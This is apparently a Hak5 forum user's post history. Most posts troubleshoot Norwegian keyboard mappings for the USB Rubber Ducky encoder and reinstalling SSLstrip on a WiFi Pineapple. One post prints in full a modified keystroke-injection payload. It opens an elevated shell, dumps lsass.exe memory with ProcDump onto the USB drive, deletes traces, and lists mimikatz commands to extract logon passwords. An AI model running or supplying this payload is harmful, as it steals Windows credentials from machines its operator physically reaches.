Jump to content

Hackman1970

Active Members
 View Profile  See their activity

  • Posts

    10

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Posts posted by Hackman1970

    [Support] SSLstrip

    in Mark V Infusions

    Posted

    I SSH into the pineapple and ran the following. This will definitely fix the sslstrip, I tested it after doing a factory reset and it worked

    opkg remove twisted-web --force-depends
opkg update
opkg install twisted-web
ln -s /sd/usr/lib/python2.7/site-packages/sslstrip /usr/lib/python2.7/site-packages/
ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL/ /usr/lib/python2.7/site-packages/
sslstrip

    This worked for me. I can now start sslstrip from console :) , but it still says not installed in web interface...

    [Poll] Which Country Keyboards Need Support

    in Classic USB Rubber Ducky

    Posted · Edited by Hackman1970

    Char not found:ASCII_5E in no.properties
    For norwegian, this did not do the trick either:
    //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^

    neither

    //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^
    In US keymap your key } is on same place as our ^
    Here is my output:
    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin
    Hak5 Duck Encoder 2.6
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    Char not found:ASCII_5E
    Char not found:ASCII_5E
    DuckyScript Complete..... [ OK ]

    To find out if more keys have problems with no.properties I made a script with all norwegian keys:

    REM *** Testscript for norwegian keyboards ***
REM *** Author: Hackman1970
REM *** Editor: LeafPad
REM *** Character Coding UTF-8

REM *** Wait for detection of RubberDucky
DELAY 2000
GUI-R
STRING notepad
DELAY 500
STRING ROW 1 OPEN  : |1234567890+\ 
ENTER
STRING ROW 1 SHIFT : §!"#¤%&/()=?`
ENTER
STRING ROW 1 ALTGR :   @£$  {[]}±'
ENTER
ENTER
STRING ROW 2 OPEN  : qwertyuiopå"
ENTER
STRING ROW 2 SHIFT : QWERTYUIOPÅ^
ENTER
STRING ROW 2 ALTGR : ¦ €        ~
ENTER
ENTER
STRING ROW 3 OPEN  : asdfghjkløæ'
ENTER
STRING ROW 3 SHIFT : ASDFGHJKLØÆ*
ENTER
ENTER
STRING ROW 4 OPEN  : <zxcvbnm,.-
ENTER
STRING ROW 4 SHIFT : >ZXCVBNM;:_
ENTER
STRING ROW 4 ALTGR : ½
ENTER

    Heres the encoders output:

    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i nbno_keys_UTF-8.txt -o inject.bin
Hak5 Duck Encoder 2.6

Loading File ..... [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
Char not found:ASCII_9
Char not found:ASCII_9
Char not found:ASCII_60
Char not found:ASCII_9
Char not found:ISO_8859_1_B1
Char not found:ASCII_9
Char not found:ASCII_9
Char not found:ASCII_5E
Char not found:ASCII_9
Char not found:ISO_8859_1_A6
Char not found:ASCII_9
Char not found:ASCII_9
Char not found:ASCII_9
Char not found:ASCII_9
Char not found:ASCII_9
DuckyScript Complete..... [ OK ]

root@kali-vb:/media/DUCKY#

    here is the output:

    ROW 1 OPEN  : |1234567890+\ OK
ROW 1 SHIFT : §!"#¤%&/()=?  MISSING ` = ( \ + SHIFT + SPACE )
ROW 1 ALTGR :   @£$  {[]}'  OK

ROW 2 OPEN  : qwertyuiopå"  OK
ROW 2 SHIFT : QWERTYUIOPÅ   MISSING ^ = ( ¨ + SHIFT + SPACE )
ROW 2 ALTGR :  €        ~   OK

ROW 3 OPEN  : asdfghjkløæ'  OK
ROW 3 SHIFT : ASDFGHJKLØÆ*  OK

ROW 4 OPEN  : <zxcvbnm,.-   OK
ROW 4 SHIFT : >ZXCVBNM;:_   OK
ROW 2 ALTGR : |             HAS CHANGED KEY

    [Poll] Which Country Keyboards Need Support

    in Classic USB Rubber Ducky

    Posted · Edited by Hackman1970

    Char not found:ASCII_5E in no.properties
    I have tried this in no.properties without any luck:
    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^
    On my keyborad this key lives upper left side of the ENTER-key and it looks like this:
     -------
|  ^    |
|     ~ | 
|  ¨    |
 -------

    I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^,is there someone out there that can give me a hint?

    Char not found:ASCII_5E in no.properties
    For norwegian, this did not do the trick either:
    //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^

    neither

    //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^
    In US keymap your key } is on same place as our ^
    Here is my output:
    root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin
    Hak5 Duck Encoder 2.6
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    Char not found:ASCII_5E
    Char not found:ASCII_5E
    DuckyScript Complete..... [ OK ]

    [Encoder] Duck Encoder V2.6.3 Released 01/12/14

    in Classic USB Rubber Ducky

    Posted

    Hello

    I got my RubberDucky some days ago and have tested a bit in norwegian.

    I ran into problems with ASCII_5E when this key ^ is in the script.

    Else I have not seen anything wrong yet...

    After som testing with no.properties I gave that up for now. This did not work:

    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^

    Instead I tried to circumvent the problem, thinking the other way around: Change "victims" keyboard to US english.

    In this post: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/

    I have made a comment at bottom of page on how to do this until no.properties have been fixed.

    [Payload] Memory Dump Windows (recover password) without setting off AV

    in Classic USB Rubber Ducky

    Posted · Edited by Hackman1970

    I had problems with norwegian keybords and this key ^ so I did som changes in the code to make it work in norwegian.

    First i tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, did not work for me.

    Instead of using no.properties I use US standard and make computer change from norwegian to us english.

    Have tested this on my Norwegian Windows 7 x64, worked perfect for me :)

    Probably the way to go insted of dk.properties an se.properties to?

    Check out my modified code:

    REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Modified to circumvent norwegian keyboards by Hackman1970
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
REM *** Input Lanugage Swap to circumvent problmes with norwegian
REM *** Norwegian Windows 7 use to have US english as second language installed by default
REM *** Using shortcut ALT-SHIFT to troggle between NO and US
ALT-SHIFT
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500

REM *** For norwegian I tried to change y[es] to j[a]
REM ALT y
REM ALT j 
REM *** The abowe did not work but LEFTARROW ENTER works :)
LEFTARROW
ENTER
DELAY 500

REM *** Swap Input Lanugage again for cmd.exe shell
ALT-SHIFT 
DELAY 200

REM *** Define DUCKY drive as %duck%
ENTER
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER

REM *** Swap Input Lanugage again hopefully back to norwegian
ALT-SHIFT 


REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
REM directory including the version of mimikatz for your targets architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

    Is this the way to go or have anyone fix for no.properties? :rolleyes:

    [Poll] Which Country Keyboards Need Support

    in Classic USB Rubber Ducky

    Posted · Edited by Hackman1970

    Char not found:ASCII_5E in no.properties
    I have tried this in no.properties without any luck:
    //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE
// 94 ^
    On my keyborad this key lives upper left side of the ENTER-key and it looks like this:
     -------
|  ^    |
|     ~ | 
|  ¨    |
 -------

    I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^,is there someone out there that can give me a hint?

×
×
  • Create New...